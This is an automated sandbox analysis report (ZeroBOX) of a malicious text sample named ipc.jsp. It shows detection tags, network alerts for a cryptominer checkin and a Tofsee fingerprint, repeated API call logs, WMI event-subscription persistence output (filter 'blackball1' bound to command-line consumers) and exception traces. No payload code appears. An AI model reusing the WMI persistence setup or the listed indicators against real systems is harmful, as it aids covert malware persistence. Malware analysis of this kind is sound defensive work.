popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ipc.jsp

Generic Malware Downloader Antivirus FTP Code injection DGA HTTP Socket Escalate priviledges Create Service KeyLogger P2P Internet API DNS Http API Steal credential ScreenShot Sniff Audio AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 14, 2021, 7:54 a.m. Sept. 14, 2021, 7:56 a.m.
Size 7.4KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 acbc478e9703c3cadde882dd8e8258e3
SHA256 cce22a39cf5b42b671a6370215cdeaf8426856f13e8dc541240255df3205ee0f
CRC32 81EE8CE8
ssdeep 192:Nqj8V0rQC2L686OY8UnG+z6zTc375rkolqtbs:u0j2OY8UnOzA37BNlms
Yara None matched

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:56357 -> 164.124.101.2:53 2027758 ET DNS Query for .cc TLD Potentially Bad Traffic
TCP 192.168.56.103:49225 -> 1.117.58.154:6363 2027316 ET POLICY Cryptocurrency Miner Checkin M2 Potential Corporate Privacy Violation
TCP 192.168.56.103:49241 -> 50.16.244.183:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49241
50.16.244.183:443 		C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA CN=*.ipify.org 6f:de:ae:2b:9f:c6:cd:5b:7f:5c:d0:69:fa:c8:8b:62:19:fd:56:ad

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: __GENUS : 2
console_handle: 0x0000001f
1 1 0

WriteConsoleW

 buffer: __CLASS : __EventFilter
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: __SUPERCLASS : __IndicationRelated
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: __DYNASTY : __SystemClass
console_handle: 0x0000002b
1 1 0

WriteConsoleW

 buffer: __RELPATH : __EventFilter.Name="blackball1"
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: __PROPERTY_COUNT : 6
console_handle: 0x00000033
1 1 0

WriteConsoleW

 buffer: __DERIVATION : {__IndicationRelated, __SystemClass}
console_handle: 0x00000037
1 1 0

WriteConsoleW

 buffer: __SERVER : TEST22-PC
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: __NAMESPACE : ROOT\subscription
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: __PATH : \\TEST22-PC\ROOT\subscription:__EventFilter.Name="blackball1
console_handle: 0x00000043
1 1 0

WriteConsoleW

 buffer: CreatorSID : {1, 5, 0, 0...}
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: EventAccess :
console_handle: 0x0000004f
1 1 0

WriteConsoleW

 buffer: EventNamespace : root\cimv2
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: Name : blackball1
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: Query : SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE
console_handle: 0x0000005b
1 1 0

WriteConsoleW

 buffer: TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: QueryLanguage : WQL
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: __GENUS : 2
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: __CLASS : __FilterToConsumerBinding
console_handle: 0x00000073
1 1 0

WriteConsoleW

 buffer: __SUPERCLASS : __IndicationRelated
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: __DYNASTY : __SystemClass
console_handle: 0x0000007b
1 1 0

WriteConsoleW

 buffer: __RELPATH : __FilterToConsumerBinding.Consumer="CommandLineEventC
console_handle: 0x0000007f
1 1 0

WriteConsoleW

 buffer: onsumer.Name=\"cFK5CejlU8\"",Filter="__EventFilter.Na
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: me=\"fFK5CejlU8\""
console_handle: 0x00000087
1 1 0

WriteConsoleW

 buffer: __PROPERTY_COUNT : 7
console_handle: 0x0000008b
1 1 0

WriteConsoleW

 buffer: __DERIVATION : {__IndicationRelated, __SystemClass}
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: __SERVER : TEST22-PC
console_handle: 0x00000093
1 1 0

WriteConsoleW

 buffer: __NAMESPACE : ROOT\subscription
console_handle: 0x00000097
1 1 0

WriteConsoleW

 buffer: __PATH : \\TEST22-PC\ROOT\subscription:__FilterToConsumerBindi
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: ng.Consumer="CommandLineEventConsumer.Name=\"cFK5Cejl
console_handle: 0x0000009f
1 1 0

WriteConsoleW

 buffer: U8\"",Filter="__EventFilter.Name=\"fFK5CejlU8\""
console_handle: 0x000000a3
1 1 0

WriteConsoleW

 buffer: Consumer : CommandLineEventConsumer.Name="cFK5CejlU8"
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: CreatorSID : {1, 5, 0, 0...}
console_handle: 0x000000ab
1 1 0

WriteConsoleW

 buffer: DeliverSynchronously : False
console_handle: 0x000000af
1 1 0

WriteConsoleW

 buffer: DeliveryQoS :
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: Filter : __EventFilter.Name="fFK5CejlU8"
console_handle: 0x000000b7
1 1 0

WriteConsoleW

 buffer: MaintainSecurityContext : False
console_handle: 0x000000bb
1 1 0

WriteConsoleW

 buffer: SlowDownProviders : False
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: __GENUS : 2
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: __CLASS : __FilterToConsumerBinding
console_handle: 0x000000cf
1 1 0

WriteConsoleW

 buffer: __SUPERCLASS : __IndicationRelated
console_handle: 0x000000d3
1 1 0

WriteConsoleW

 buffer: __DYNASTY : __SystemClass
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: __RELPATH : __FilterToConsumerBinding.Consumer="CommandLineEventC
console_handle: 0x000000db
1 1 0

WriteConsoleW

 buffer: onsumer.Name=\"ccY1qeivC\"",Filter="__EventFilter.Nam
console_handle: 0x000000df
1 1 0

WriteConsoleW

 buffer: e=\"fcY1qeivC\""
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: __PROPERTY_COUNT : 7
console_handle: 0x000000e7
1 1 0

WriteConsoleW

 buffer: __DERIVATION : {__IndicationRelated, __SystemClass}
console_handle: 0x000000eb
1 1 0

WriteConsoleW

 buffer: __SERVER : TEST22-PC
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: __NAMESPACE : ROOT\subscription
console_handle: 0x000000f3
1 1 0

WriteConsoleW

 buffer: __PATH : \\TEST22-PC\ROOT\subscription:__FilterToConsumerBindi
console_handle: 0x000000f7
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052a658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052a658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052a3d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052a3d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052a358
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0052a358
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x761e4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74faef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74fa6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74fc5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x750406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x762bd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x762bd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x762bddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x761d8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x761d8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x761d950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x762bdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x762bdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x762be1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x761d9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x761d9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x751762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75176d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x751777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7517788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7619a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7619853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7619a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x761acd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x761ad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 47640944
registers.edi: 6286100
registers.eax: 47640944
registers.ebp: 47641024
registers.edx: 49
registers.ebx: 47641308
registers.esi: 2147746133
registers.ecx: 6055136
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x762bf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74fc414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7618fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x762ba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76b8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76b672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76b5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76b8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76b587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76b58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76b5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76b8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76b5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76b5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76b5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76b5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76b58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76b5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76b59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76b59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6f976f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6f976e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6f9727a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6f972652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6f97253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6f972411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6f9725ab
wmic+0x39c80 @ 0xf9c80
wmic+0x3b06a @ 0xfb06a
wmic+0x3b1f8 @ 0xfb1f8
wmic+0x36fcd @ 0xf6fcd
wmic+0x3d6e9 @ 0xfd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 2812992
registers.edi: 1981610512
registers.eax: 2812992
registers.ebp: 2813072
registers.edx: 1
registers.ebx: 6024460
registers.esi: 2147746133
registers.ecx: 302771055
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x761e4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74faef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74fa6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74fc5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x750406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x762bd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x762bd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x762bddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x761d8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x761d8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x761d950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x762bdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x762bdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x762be1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x761d9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x761d9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x751762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75176d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x751777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7517788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7619a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7619853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7619a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x761acd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x761ad87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 42857068
registers.edi: 3211004
registers.eax: 42857068
registers.ebp: 42857148
registers.edx: 49
registers.ebx: 42857432
registers.esi: 2147746133
registers.ecx: 2974968
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x762bf725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74fc414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7618fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x762ba338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76b8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76b672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76b5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76b8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76b587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76b58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76b5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76b8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76b5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76b5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76b5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76b5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76b58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76b5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76b59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76b59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6f976f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6f976e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6f9727a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6f972652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6f97253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6f972411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6f9725ab
wmic+0x39c80 @ 0xf9c80
wmic+0x3b06a @ 0xfb06a
wmic+0x3b1f8 @ 0xfb1f8
wmic+0x36fcd @ 0xf6fcd
wmic+0x3d6e9 @ 0xfd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7677b727
registers.esp: 1697288
registers.edi: 1981610512
registers.eax: 1697288
registers.ebp: 1697368
registers.edx: 1
registers.ebx: 2944292
registers.esi: 2147746133
registers.ecx: 1840869517
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74fb374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x761e4387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74faef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74fa6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74fa6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74fc5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x750406b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x762bd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x762bd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x762bddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x761d8a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x761d8938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x761d950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x762bdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x762bdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x762be1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x761d9367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x761d9326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x751762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75176d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x751777c4
